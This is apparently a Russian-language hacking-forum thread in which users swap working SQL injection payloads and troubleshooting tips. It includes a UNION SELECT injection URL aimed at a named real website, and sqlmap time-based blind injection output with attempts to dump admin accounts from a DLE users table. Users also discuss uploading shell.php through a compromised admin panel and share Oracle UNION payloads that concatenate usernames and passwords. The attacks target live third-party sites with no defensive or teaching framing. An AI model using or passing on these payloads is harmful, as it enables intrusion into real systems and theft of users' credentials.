Таблицу захекси Code: http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM%20%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=0x6161646d5f7573657273+LIMIT+0,1+--+
Вопрос по склмап. Нашел слепую иньекцию. sqlmap подтвердил что это иньекция, вытащил список бд и всех таблиц. Однако, когда попытался вытащить акк админа (из другой базы. имена взял из вывода склмапа) он что-то странно себя вел. Иньекция: Code: --- Place: GET Parameter: rec Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: rec=83990 AND SLEEP(5) --- Пытаюсь получить хоть что-то из бд: Code: ./sqlmap.py --url=адрес --sql-query="SELECT name FROM db_name.dle_users;" Вывод: Code: [09:27:24] [WARNING] the SQL query provided does not return any output [09:27:24] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex' SELECT name FROM db_name.dle_users;: None Любые попытки получить информация заканчиваются именно так. Один раз был такой вывод: Code: SELECT user_id FROM db_name.dle_users; [4]: [*] B [*] [*] ! [*] A Что делать? Попытки создать нового пользователя тоже провалились..Я думаю если он увидел список таблиц, то значит права на чтение точно есть. Или я не прав? Тогда должна быть возможность сделать выборку.
Точно, попробую. Боюсь только что проблема в том, что возможно он будет вырубаться по таймауту, если брутить долго.
такая ситуация: есть доступ в админку, есть аплоад файлов, лью shell.php, он заливается на сервер 100%, потому что я его потом через менеджер загрузки вижу среди остальных файлов и даже редактировать могу, перехожу по ссылке на него а серв грит Code: Невозможно обработать запрос "media/shell.php". ps хотя например txt и jpg файлы норм открывает ну как-то совсем обидно ((
2boortyhuhtyu http://www.debian-blog.ru/web-server/nastrojka-apache2-i-virtualnyx-xostov.html 2pirat0 ОК!
Судя по всему жесткое ограничение на путь к директории заливки файла аплоадером и noexec на оной пресекают более-менее стандартные варианты злодеяния.
com.microsoft.sqlserver.jdbc.SQLServerException: All queries combined using a UNION, INTERSECT or EXCEPT operator must have the same number of expressions in their target lists.
Не одинаковое кол-во колонок в запросах SELECT и UNION SELECT, если я правильно понял суть Вашего поста!
Помогите с oracle. Как вывести логины и пассы вместе? union+select+null,null,password,null,null,null,null+from+users-- union+select+null,null,username,,null,null,null,null+from+users-- По отдельности выводит.
Code: union+select+null,null,concat(username,password),null,null,null,nul l+from+users-- Code: union+select+null,null,(username || ':' || password)x,null,null,null,nul l+from+users--